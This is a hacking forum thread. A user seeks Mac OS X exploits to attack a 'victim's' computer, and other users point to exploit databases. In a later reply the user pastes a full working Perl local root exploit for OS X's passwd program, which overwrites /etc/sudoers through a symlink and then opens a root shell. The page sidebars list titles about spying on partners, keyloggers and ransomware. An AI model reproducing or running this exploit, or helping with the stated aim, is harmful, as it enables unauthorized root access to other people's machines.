Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread: Any Exploits for Mac OSX?
- Hot
- Active
-
Forum Thread:
How Is Penetration Testing Take Place Over WAN?
12
Replies
2 hrs ago -
Forum Thread:
Mostly Need Help Binding Two Exe Files
6
Replies
8 hrs ago -
Forum Thread:
Security in IOT ( Internet of Things ) By [Mohamed Ahmed]
0
Replies
8 hrs ago -
COMPLEX MALWARE:
METAMORPHISM, POLYMORPHISM and EPO | THEORY and PRACTICAL EXAMPLES by [Mohamed Ahmed].
0
Replies
9 hrs ago -
Forum Thread:
REVERSE ENGINEERING on ANDROID | CAP 1
0
Replies
12 hrs ago -
Forum Thread:
Hacking Terminals via Web !!!!! By: [ Mohamed Ahmed ]
0
Replies
14 hrs ago -
Forum Thread:
Network Infrastructure and Hacking Techniques [Theory Theory] [Part 1] by : Mohamed Ahmed .
0
Replies
14 hrs ago -
Forum Thread:
Ichidan, Shodan Clone in the Deep Web
0
Replies
14 hrs ago -
Forum Thread:
How to Hack a Facebook Account Using Kali Linux 2.0 ?
21
Replies
1 day ago -
Forum Thread:
Thoughts on Buying Hacking Gear and Anonymity
0
Replies
1 day ago -
Forum Thread:
Best Book to Read on Hacking
8
Replies
1 day ago -
Forum Thread:
Cdr File Damaged
0
Replies
1 day ago -
Forum Thread:
Arpspoof - No Connectivity on Physical Machine
2
Replies
2 days ago -
Forum Thread:
How to Build Cheapest Password Cracker on Multiple GPUs?
0
Replies
2 days ago -
Forum Thread:
Active White-Hat Forums?
14
Replies
2 days ago -
Forum Thread:
Apis for Trojans [ a gift from me ]
0
Replies
3 days ago -
Forum Thread:
Creating a Ransomware for Android from 0! By [ Mohamed Ahmed ]
0
Replies
3 days ago -
Forum Thread:
Hack Cheating Wife's Windows 7 Admin Password
12
Replies
3 days ago -
Forum Thread:
BlueBorne - Kali Linux Script?
9
Replies
3 days ago -
Forum Thread:
How to Install This Custom Metasploit?
0
Replies
3 days ago
-
How To:
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
How to Hack Wi-Fi:
Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
-
How To:
Get Unlimited Free Trials Using a "Real" Fake Credit Card Number
-
How To:
Exploring Kali Linux Alternatives: How to Get Started with BlackArch, a More Up-to-Date Pentesting Distro
-
How to Hack Wi-Fi:
Capturing WPA Passwords by Targeting Users with a Fluxion Attack
-
How To:
Set Up a Headless Raspberry Pi Hacking Platform Running Kali Linux
-
How To:
Crack Any Master Combination Lock in 8 Tries or Less Using This Calculator
-
How To:
Install Kali Live on a USB Drive (With Persistence, Optional)
-
How To:
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2017
-
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To:
Use a Virtual Burner Phone to Protect Your Identity & Security
-
How to Hack Wi-Fi:
Getting Started with the Aircrack-Ng Suite of Wi-Fi Hacking Tools
-
Hack Like a Pro:
How to Secretly Hack Into, Switch On, & Watch Anyone's Webcam Remotely
-
Hack Like a Pro:
How to Spy on Anyone, Part 1 (Hacking Computers)
-
How To:
Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet!
-
How To:
Successfully Hack a Website in 2016!
-
News:
20 Things to Do with Kali Linux After Installation
-
How To:
Hack Forum Accounts with Password-Stealing Pictures
-
Hack Like a Pro:
How to Remotely Install a Keylogger onto Your Girlfriend's Computer
-
How To:
Locked Out of Your Phone? Here's How You Bypass the Android Pattern Lock Screen
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts